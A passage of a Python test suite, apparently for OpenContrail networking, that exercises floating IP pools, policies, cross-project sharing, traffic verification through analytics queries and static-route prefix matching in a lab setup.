if not vn1_vm1_fixture.ping_with_certainty(fvn2_vm1_fixture.vm_ip):
result = result and False
# Unbind
fvn1_fixture.unbind_policies(
fvn1_fixture.vn_id, [policy1_fixture.policy_fq_name])
fvn2_fixture.unbind_policies(
fvn2_fixture.vn_id, [policy2_fixture.policy_fq_name])
sleep(2)
if not vn1_vm1_fixture.ping_to_ip(fvn2_vm1_fixture.vm_ip):
self.logger.info(
"Here ping should fail from VM as Policy is removed from the VN")
else:
self.logger.error(
"Ping should fail. But ping is successful even after removal of policy")
result = result and False
        self.logger.info('Communication via FIP should still work')
        self.logger.info(
            'Ping from VM %s to the other VM in a different network using FIP %s' %
            (vn1_vm1_name, fip_fixture1.fip[fip_id2]))
if not vn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id2]):
result = result and False
# Rebind the policy here for cleanup purpose.
fvn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], fvn1_fixture.vn_id)
fvn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], fvn2_fixture.vn_id)
if not result:
            self.logger.error('Test of FIP with policy failed')
assert result
return True
    # end test_fip_with_policy
@preposttest_wrapper
def test_fip_pool_shared_across_project(self):
        ''' Verify that a FIP pool is shared across different projects.
'''
result = True
fip_pool_name = 'small-pool1'
fvn_name = 'floating-vn'
fvm_name = 'floating-vm'
fvn_subnets = ['121.1.1.0/30']
vm1_name = 'vm400'
vn1_name = 'vn400'
vn1_subnets = ['131.1.1.0/24']
vm2_name = 'vm500'
vn2_name = 'vn500'
vn2_subnets = ['141.1.1.0/24']
self.demo_proj_inputs1 = self.useFixture(ContrailTestInit(
self.ini_file, stack_user='admin', stack_password='contrail123', project_fq_name=['default-domain', 'demo']))
self.demo_proj_connections1 = ContrailConnections(
self.demo_proj_inputs1)
# VN Fixture
fvn_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name, inputs=self.inputs, subnets=fvn_subnets))
assert fvn_fixture.verify_on_setup()
fvn_fixture1 = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name, inputs=self.inputs, subnets=fvn_subnets))
assert fvn_fixture1.verify_on_setup()
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn2_fixture = self.useFixture(
VNFixture(
project_name='demo', connections=self.demo_proj_connections1,
vn_name=vn2_name, inputs=self.demo_proj_inputs1, subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
# VM Fixture
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1_fixture.obj, vm_name=vm1_name))
vm2_fixture = self.useFixture(
VMFixture(
project_name='demo', connections=self.demo_proj_connections1,
vn_obj=vn2_fixture.obj, vm_name=vm2_name))
# fvm_fixture= self.useFixture(VMFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_obj= fvn_fixture.obj, vm_name= fvm_name))
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
#assert fvm_fixture.verify_on_setup()
# Floating Ip Fixture
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
# Adding further projects to floating IP.
self.logger.info('Adding project demo to FIP pool %s' %
(fip_pool_name))
project_obj = fip_fixture.assoc_project(fip_fixture, 'demo')
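        # assoc_project() extends the FIP pool so that the 'demo' project can draw
        # FIPs from it (this is the intent implied by the surrounding log messages).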
# Asscociating FIP to VM under demo project
self.logger.info(
'Allocating FIP to VM %s in Demo project from VN %s under admin project' %
(vm2_name, fvn_name))
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm2_fixture.vm_id, project_obj)
assert fip_fixture.verify_fip(fip_id, vm2_fixture, fvn_fixture)
self.logger.info(
'FIP pool is exhausted now. Trying to add FIP to VM under admin project. Should FAIL')
fip_id1 = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
        if fip_id1 is not None:
            self.logger.error(
                'FIP should not get created/associated as the pool is already exhausted')
result = result and False
self.logger.info(
'Releasing FIP to VM %s in Demo project from VN %s under admin project' %
(vm2_name, fvn_name))
fip_fixture.disassoc_and_delete_fip(fip_id)
if result is True:
self.logger.info(
'Allocating FIP to VM %s in admin project from VN %s under admin project' %
(vm1_name, fvn_name))
fip_id2 = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id2, vm1_fixture, fvn_fixture)
fip_fixture.disassoc_and_delete_fip(fip_id2)
# Removing further projects from floating IP pool. For cleanup
        self.logger.info('Removing project demo from FIP pool %s' %
                         (fip_pool_name))
project_obj = fip_fixture.deassoc_project(fip_fixture, 'demo')
if not result:
            self.logger.error(
                'Test Failed: Verify FIP pool is shared across different projects')
assert result
return True
# end test_fip_pool_shared_across_project
@preposttest_wrapper
def test_communication_across__diff_proj(self):
        ''' Test communication across different projects using a Floating IP.
'''
result = True
fip_pool_name = 'some-pool2'
vm_names = ['Test_Vm_100', 'Test_VM_200']
vn_names = ['Test_Vn_100', 'Test_Vn_200']
vn_subnets = [['31.1.1.0/24'], ['41.1.1.0/24']]
projects = ['project111', 'project222']
user_list = [('test1', 'test123', 'admin'),
('test2', 'test123', 'admin')]
        # Making sure the VMs land on different compute hosts
host_list = []
for host in self.inputs.compute_ips:
host_list.append(self.inputs.host_data[host]['name'])
compute_1 = host_list[0]
compute_2 = host_list[0]
if len(host_list) > 1:
compute_1 = host_list[0]
compute_2 = host_list[1]
# Projects
project_fixture1 = self.useFixture(
ProjectFixture(
project_name=projects[
0], vnc_lib_h=self.vnc_lib, username=user_list[0][0],
password=user_list[0][1], connections=self.connections))
project_inputs1 = self.useFixture(
ContrailTestInit(
self.ini_file, stack_user=project_fixture1.username,
stack_password=project_fixture1.password, project_fq_name=['default-domain', projects[0]]))
project_connections1 = ContrailConnections(project_inputs1)
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
projects[0])
project_fixture1.set_sec_group_for_allow_all(projects[0], 'default')
project_fixture2 = self.useFixture(
ProjectFixture(
project_name=projects[
1], vnc_lib_h=self.vnc_lib, username=user_list[1][0],
password=user_list[1][1], connections=self.connections))
project_inputs2 = self.useFixture(
ContrailTestInit(
self.ini_file, stack_user=project_fixture2.username,
stack_password=project_fixture2.password, project_fq_name=['default-domain', projects[1]]))
project_connections2 = ContrailConnections(project_inputs2)
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
projects[1])
project_fixture2.set_sec_group_for_allow_all(projects[1], 'default')
# VN
vn1_fixture = self.useFixture(
VNFixture(
project_name=projects[0], connections=project_connections1,
vn_name=vn_names[0], inputs=project_inputs1, subnets=vn_subnets[0]))
vn2_fixture = self.useFixture(
VNFixture(
project_name=projects[1], connections=project_connections2,
vn_name=vn_names[1], inputs=project_inputs2, subnets=vn_subnets[1]))
assert vn1_fixture.verify_on_setup()
assert vn2_fixture.verify_on_setup()
# VM
vm1_fixture = self.useFixture(
VMFixture(connections=project_connections1,
vn_obj=vn1_fixture.obj, vm_name=vm_names[0], project_name=projects[0], node_name=compute_1))
vm2_fixture = self.useFixture(
VMFixture(connections=project_connections2,
vn_obj=vn2_fixture.obj, vm_name=vm_names[1], project_name=projects[1], node_name=compute_2))
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
vm1_fixture.wait_till_vm_is_up()
vm2_fixture.wait_till_vm_is_up()
# Floating Ip Fixture
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=project_inputs1.project_name, inputs=project_inputs1,
connections=project_connections1, pool_name=fip_pool_name, vn_id=vn1_fixture.vn_id))
assert fip_fixture.verify_on_setup()
# Adding further projects to floating IP.
        self.logger.info('Adding project %s to FIP pool %s' %
                         (projects[0], fip_pool_name))
project_obj = fip_fixture.assoc_project(fip_fixture, projects[0])
self.logger.info(
'Allocating FIP to VM %s in project %s from VN %s in project %s ' %
(vm2_fixture.vm_name, projects[1], vn_names[0], projects[0]))
fip_id = fip_fixture.create_and_assoc_fip(
vn1_fixture.vn_id, vm2_fixture.vm_id, project_obj)
assert fip_fixture.verify_fip(fip_id, vm2_fixture, vn1_fixture)
if not vm1_fixture.ping_with_certainty(fip_fixture.fip[fip_id]):
result = result and False
fip_fixture.disassoc_and_delete_fip(fip_id)
# Removing further projects from floating IP pool. For cleanup
self.logger.info('Removing project %s from FIP pool %s' %
(projects[0], fip_pool_name))
project_obj = fip_fixture.deassoc_project(fip_fixture, projects[0])
if not result:
            self.logger.error(
                'Test Failed: communication across different projects using Floating IP')
assert result
return result
# end test_communication_across__diff_proj
    def remove_from_cleanups(self, fix):
        # Iterate over a copy; removing items from the list while iterating over it
        # would skip every other entry.
        for cleanup in list(self._cleanups):
            self._cleanups.remove(cleanup)
    # end remove_from_cleanups
@preposttest_wrapper
def test_traffic_to_fip(self):
        '''Test traffic sent to the FIP, across the borrower and giving VNs.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not fvn1_vm1_traffic_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
# Send UDP traffic
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
vn1_vm1_traffic_fixture.install_pkg("Traffic")
src_vn = 'default-domain' + ':' + \
self.inputs.project_name + ':' + fvn1_fixture.vn_name
dst_vn = 'default-domain' + ':' + \
self.inputs.project_name + ':' + fvn1_fixture.vn_name
query = {}
query['udp'] = '(' + 'sourcevn=' + src_vn + ') AND (destvn=' + dst_vn + ') AND (protocol =17) AND (sourceip = ' + \
fip_fixture1.fip[fip_id1] + \
') AND (destip = ' + \
fvn1_vm1_traffic_fixture.vm_ip + ')'
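        # The opserver flow query above filters on the FIP as the source IP and the
        # fvn1 traffic VM as the destination, i.e. (presumably) the NAT'd leg of the
        # flow where the borrower VM's address is rewritten to the FIP.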
flow_record_data = {}
flow_series_data = {}
start_time = self.analytics_obj.getstarttime(
fvn1_vm1_traffic_fixture.vm_node_ip)
self.logger.info("start time= %s" % (start_time))
sleep(5)
# Verify Traffic ---
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['udp']
total_streams = {}
total_streams['udp'] = 1
dpi = 9100
proto = 'udp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=fvn1_vm1_traffic_fixture, rx_vm_fixture=vn1_vm1_traffic_fixture, stream_proto=proto, chksum=True, fip=fip_fixture1.fip[fip_id1])
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, fvn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
sleep(5)
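# Query the opserver FlowRecord and FlowSeries tables for the UDP flow and compare the flow count with the streams started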
for proto in traffic_proto_l:
flow_record_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query('FlowRecordTable', dir=0, start_time=start_time, end_time='now', select_fields=[
'sourcevn', 'sourceip', 'destvn', 'destip', 'setup_time', 'teardown_time', 'agg-packets', 'agg-bytes', 'protocol'], where_clause=query[proto])
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time=start_time, end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
msg = proto + \
" Flow count info is not matching with opserver flow series record"
# self.assertEqual(flow_series_data[proto][0]['flow_count'],total_streams[proto],msg)
assert(flow_series_data[proto][0]
['flow_count'] == total_streams[proto]), msg
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
if stopStatus[proto] != []:
result = False
self.logger.info("Status of stop traffic for proto %s is %s" %
(proto, stopStatus[proto]))
for rcv_count in range(0, total_streams[proto]):
if traffic_obj[proto].receiver[rcv_count].corrupt > 0:
self.logger.error(
"In Stream %s of %s, %s packets are corrupted" %
(rcv_count, proto, traffic_obj[proto].receiver[rcv_count].corrupt))
result = False
else:
self.logger.info(
"In Stream %s of %s, No packets are corrupted" %
(rcv_count, proto))
self.logger.info("-" * 80)
# Get the traffic Stats for each protocol sent
traffic_stats[proto] = traffic_obj[proto].returnStats()
# Get the Opserver Flow series data
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time=start_time, end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
self.logger.info("-" * 80)
#self.assertEqual(result, True, msg)
assert(result == True), msg
for proto in traffic_proto_l:
self.logger.info(
" verify %s traffic status against to Analytics flow series data" % (proto))
msg = proto + \
" Traffic Stats is not matching with opServer flow series data"
self.logger.info(
"***Actual Traffic sent by agent %s \n\n stats shown by Analytics flow series%s" %
(traffic_stats[proto], flow_series_data[proto]))
print flow_series_data[proto]
for i in xrange(len(flow_series_data[proto]) - 1):
if flow_series_data[proto][i]['destip'] == fip_fixture1.fip[fip_id1]:
# self.assertGreaterEqual(flow_series_data[proto][i]['sum(packets)'],traffic_stats[proto]['total_pkt_sent'],msg)
assert(flow_series_data[proto][i]['sum(packets)']
>= traffic_stats[proto]['total_pkt_sent']), msg
self.logger.info("-" * 80)
self.logger.info(
"***Let flows age out and verify analytics still shows the data in the history***")
self.logger.info("-" * 80)
time.sleep(180)
for proto in traffic_proto_l:
self.logger.info(
" verify %s traffic status against Analytics flow series data after flow age out" % (proto))
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time='now', end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
msg = proto + \
" Flow count info is not matching with opserver flow series record after flow age out in kernel"
# self.assertEqual(len(flow_series_data[proto]),0,msg)
assert(len(flow_series_data[proto]) == 0), msg
flow_series_data[proto] = self.analytics_obj.ops_inspect[self.inputs.collector_ips[0]].post_query(
'FlowSeriesTable', dir=0, start_time=start_time, end_time='now', select_fields=['sourcevn', 'sourceip', 'destvn', 'destip', 'sum(packets)', 'flow_count', 'sum(bytes)', 'sum(bytes)'], where_clause=query[proto])
msg = proto + \
" Traffic Stats is not matching with opServer flow series data after flow age out in kernel"
# Historical data should be present in the Analytics, even if flows
# age out in kernel
for i in xrange(len(flow_series_data[proto]) - 1):
if flow_series_data[proto][i]['destip'] == fip_fixture1.fip[fip_id1]:
# self.assertGreaterEqual(flow_series_data[proto][i]['sum(packets)'],traffic_stats[proto]['total_pkt_sent'],msg)
assert(flow_series_data[proto][i]['sum(packets)']
>= traffic_stats[proto]['total_pkt_sent']), msg
if not result:
self.logger.error(
'Test Failed. Floating IP test with traffic failed')
assert result
return result
# end test_traffic_to_fip
@preposttest_wrapper
def test_ping_to_fip_using_diag(self):
'''Test ping to floating IP using diag introspect.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
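# Ping the FIP via the vrouter agent's diag introspect on the compute node hosting the fvn1 VM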
inspect_h1 = self.agent_inspect[fvn1_vm1_fixture.vm_node_ip]
self.logger.info("Pinging using diag introspect from IP %s to IP %s" %
(fvn1_vm1_fixture.vm_ip, fip_fixture1.fip[fip_id1]))
result = inspect_h1.get_vna_verify_diag_ping(src_ip=fvn1_vm1_fixture.vm_ip, dst_ip=fip_fixture1.fip[
fip_id1], vrf=fvn1_vm1_fixture.agent_vrf_objs['vrf_list'][0]['name'], proto='17')
if not result:
self.logger.error('Test to ping using diag introspect between IPs %s and %s failed' %
(fvn1_vm1_fixture.vm_ip, fip_fixture1.fip[fip_id1]))
assert result
return result
# end test_ping_to_fip_using_diag
@preposttest_wrapper
def test_floating_ip(self):
'''Test to validate floating-ip assignment to a VM. It creates a VM, assigns a FIP to it and pings an IP in the FIP VN.
'''
result = True
fip_pool_name = 'some-pool1'
fvn_name = self.res.fvn1_name
fvn_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
fvn_vm1_fixture = self.res.fvn1_vm1_fixture
fvn_subnets = self.res.fvn1_subnets
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
assert fvn_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert fvn_vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn1_vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vn1_vm1_fixture, fvn_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fvn_vm1_fixture.vm_ip):
result = result and False
fip_fixture.disassoc_and_delete_fip(fip_id)
if not result:
self.logger.error('Test to ping between VMs %s and %s failed' %
(vm1_name, fvn_vm1_fixture.vm_name))
assert result
return True
# end test_floating_ip
@preposttest_wrapper
def test_tcp_transfer_from_fip_vm(self):
''' Validate data transfer through floating ip.
'''
self.logger.info('Reading default encap priority before continuing')
default_encap_prior = self.connections.read_vrouter_config_encap()
self.logger.info("Default encap priority is %s" % default_encap_prior)
self.logger.info('Setting new Encap before continuing')
config_id = self.connections.update_vrouter_config_encap(
'MPLSoGRE', 'MPLSoUDP', 'VXLAN')
self.logger.info(
'Created. UUID is %s. MPLSoGRE is the highest priority encap' % (config_id))
self.addCleanup(self.connections.update_vrouter_config_encap, encap1=default_encap_prior[
0], encap2=default_encap_prior[1], encap3=default_encap_prior[2])
fip_pool_name = 'testpool'
fvn_name = 'vn-public'
fvm_name = 'fvm'
fvn_subnets = ['100.1.1.0/24']
vn1_name = 'vn-frontend'
vm1_name = 'vm-fe'
vn1_subnets = ['192.168.1.0/24']
vn2_name = 'vn-backend'
vm2_name = 'vm-be'
vn2_subnets = ['192.168.2.0/24']
# policy between frontend and backend
policy_name = 'frontend-to-backend-policy'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'any',
'source_network': vn1_name,
'dest_network': vn2_name,
},
]
policy_fixture = self.useFixture(
PolicyFixture(policy_name=policy_name,
rules_list=rules, inputs=self.inputs,
connections=self.connections))
# frontend VN
vn1_fixture = self.useFixture(VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets,
policy_objs=[policy_fixture.policy_obj]))
vn1_fixture.verify_on_setup()
# backend VN
vn2_fixture = self.useFixture(VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn2_name, inputs=self.inputs, subnets=vn2_subnets,
policy_objs=[policy_fixture.policy_obj]))
vn2_fixture.verify_on_setup()
# public VN
fvn_fixture = self.useFixture(VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name, inputs=self.inputs, subnets=fvn_subnets))
fvn_fixture.verify_on_setup()
# frontend VM
vm1_fixture = self.useFixture(VMFixture(image_name='redmine-fe',
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1_fixture.obj, vm_name=vm1_name, flavor='contrail_flavor_medium'))
# backend VM
vm2_fixture = self.useFixture(VMFixture(image_name='redmine-be',
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn2_fixture.obj, vm_name=vm2_name, flavor='contrail_flavor_medium'))
# public VM
fvm_fixture = self.useFixture(VMFixture(image_name='ubuntu',
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=fvn_fixture.obj, vm_name=fvm_name))
assert vm1_fixture.verify_on_setup()
assert vm2_fixture.verify_on_setup()
assert fvm_fixture.verify_on_setup()
fip_fixture = self.useFixture(FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name,
vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(fvn_fixture.vn_id,
vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
fip = vm1_fixture.vnc_lib_h.floating_ip_read(
id=fip_id).get_floating_ip_address()
assert fvm_fixture.ping_with_certainty(fip)
result = fvm_fixture.tcp_data_transfer(vm1_fixture.local_ip, fip)
assert result
return result
# end test_tcp_transfer_from_fip_vm
@preposttest_wrapper
def test_multiple_floating_ip_for_single_vm(self):
'''Test to validate floating-ip assignment to a VM. It creates a VM, assigns a FIP to it and pings an IP in the FIP VN.
'''
result = True
fip_pool_name = 'some-other-pool1'
fvn_name = self.res.fvn1_name
fvm_name = self.res.fvn1_vm1_name
fvn_subnets = self.res.fvn1_subnets
fip_pool_name1 = 'some-pool2'
fvn_name1 = 'fvnn200'
fvm_name1 = 'vm200'
fvn_subnets1 = ['150.1.1.0/24']
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
# VN Fixture
# fvn_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_name=fvn_name, inputs= self.inputs, subnets= fvn_subnets))
fvn_fixture = self.res.fvn1_fixture
assert fvn_fixture.verify_on_setup()
fvn_fixture1 = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=fvn_name1, inputs=self.inputs, subnets=fvn_subnets1))
assert fvn_fixture1.verify_on_setup()
# vn1_fixture= self.useFixture(VNFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_name=vn1_name, inputs= self.inputs, subnets= vn1_subnets))
vn1_fixture = self.res.vn1_fixture
assert vn1_fixture.verify_on_setup()
# VM Fixture
# vm1_fixture= self.useFixture(VMFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_obj= vn1_fixture.obj, vm_name= vm1_name))
vm1_fixture = self.res.vn1_vm1_fixture
assert vm1_fixture.verify_on_setup()
# fvm_fixture= self.useFixture(VMFixture(project_name= self.inputs.project_name, connections= self.connections,
# vn_obj= fvn_fixture.obj, vm_name= fvm_name))
fvm_fixture = self.res.fvn1_vm1_fixture
assert fvm_fixture.verify_on_setup()
fvm_fixture1 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=fvn_fixture1.obj, vm_name=fvm_name1))
assert fvm_fixture1.verify_on_setup()
# Floating Ip Fixture
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn_fixture1.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
fip_id1 = fip_fixture.create_and_assoc_fip(
fvn_fixture1.vn_id, vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id1, vm1_fixture, fvn_fixture1)
# Check the communication from the borrower VM to both provider networks
if not vm1_fixture.ping_with_certainty(fvm_fixture.vm_ip):
result = result and False
if not vm1_fixture.ping_with_certainty(fvm_fixture1.vm_ip):
result = result and False
# Check that the floating IP provider VNs cannot communicate with
# each other
self.logger.info(
'Ping should fail here. %s and %s should not be able to communicate with each other' %
(fvm_name1, fvm_name))
if fvm_fixture1.ping_to_ip(fvm_fixture.vm_ip):
result = result and False
# Check that after disassociation of the floating IP, communication
# should stop only from that network
fip_fixture.disassoc_and_delete_fip(fip_id)
self.logger.info(
'Ping should fail here as floating IP pool is already released')
if vm1_fixture.ping_to_ip(fvm_fixture.vm_ip):
result = result and False
if not vm1_fixture.ping_with_certainty(fvm_fixture1.vm_ip):
result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id1)
if not result:
self.logger.error(
'Test to check multiple floating ip for single VM has failed')
assert result
return True
# end test_multiple_floating_ip_for_single_vm
@preposttest_wrapper
def test_longest_prefix_match_with_fip_and_staticroute(self):
'''1. Create vn1 and vn2; launch vm1, vm2 in vn1 and vm3 in vn2
2. Create a static route with the vn2 subnet pointing to vm2
3. Allocate a fip from vn2 to vm1
4. Expect ping from vm1 to vm3 to pass, following longest prefix match
'''
result = True
vn1_name = 'vn111'
vn1_subnets = ['1.1.1.0/24']
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn1_name, inputs=self.inputs, subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vn1_obj = vn1_fixture.obj
vn2_name = 'vn222'
vn2_subnets = ['2.2.2.0/24']
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_name=vn2_name, inputs=self.inputs, subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vn2_obj = vn2_fixture.obj
vm1_name = 'vm111'
vm1_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn1_obj, vm_name=vm1_name, project_name=self.inputs.project_name))
assert vm1_fixture.verify_on_setup()
vm2_name = 'vm222'
vm2_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn1_obj, vm_name=vm2_name, project_name=self.inputs.project_name))
assert vm2_fixture.verify_on_setup()
vm3_name = 'vm333'
vm3_fixture = self.useFixture(VMFixture(connections=self.connections,
vn_obj=vn2_obj, vm_name=vm3_name, project_name=self.inputs.project_name))
assert vm3_fixture.verify_on_setup()
vm2_vmi_id = vm2_fixture.cs_vmi_obj[vn1_fixture.vn_fq_name][
'virtual-machine-interface']['uuid']
add_static_route_cmd = 'python provision_static_route.py --prefix 2.2.2.0/24 --virtual_machine_interface_id ' + vm2_vmi_id + \
' --tenant_name "admin" --api_server_ip 127.0.0.1 --api_server_port 8082 --oper add --route_table_name my_route_table'
